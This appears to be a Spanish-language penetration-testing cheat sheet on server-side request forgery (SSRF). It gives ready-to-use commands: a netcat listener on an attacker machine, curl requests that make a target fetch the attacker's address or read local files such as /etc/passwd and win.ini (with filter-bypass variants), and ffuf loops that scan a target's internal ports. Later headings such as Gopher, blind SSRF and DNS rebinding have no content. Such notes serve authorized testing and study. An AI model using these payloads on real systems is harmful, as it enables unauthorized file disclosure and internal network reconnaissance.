Server-side request forgery (SSRF)
Identificación SSRF
# Máquina atacante
nc -lvnp <listen-port>
# Ejecución desde máquina atacante
curl -i -s "http://<target>/load?page=http://<attacker-IP-address>:<listen-port>"
curl -i -s "http://<target>/load?page=file:///etc/passwd"
curl -i -s "http://<target>/load?page=file:://///etc/passwd"
curl -i -s "http://<target>/load?page=file:///c:/windows/win.ini"
curl -i -s "http://<target>/load?page=file:://///c:/windows/win.ini"Escaneo de puertos internos
for port in {1..65535}; do echo $port >> ports.txt; done# GET
ffuf -u "http://<target>/load?page=http://127.0.0.1:FUZZ" -w ports.txt -fs <size>
# POST
ffuf -u "http://<target>/load" -w ports.txt:FUZZ -X POST -d "page=http://127.0.0.1:FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -fs <size>Rangos de IP privados
Direcciones de enlace local
Protocolos
File
Gopher
Blind SSRF
Capturar interacciones
Time-based SSRF
Payloads
Redirecciones HTTP
DNS rebinding
Última actualización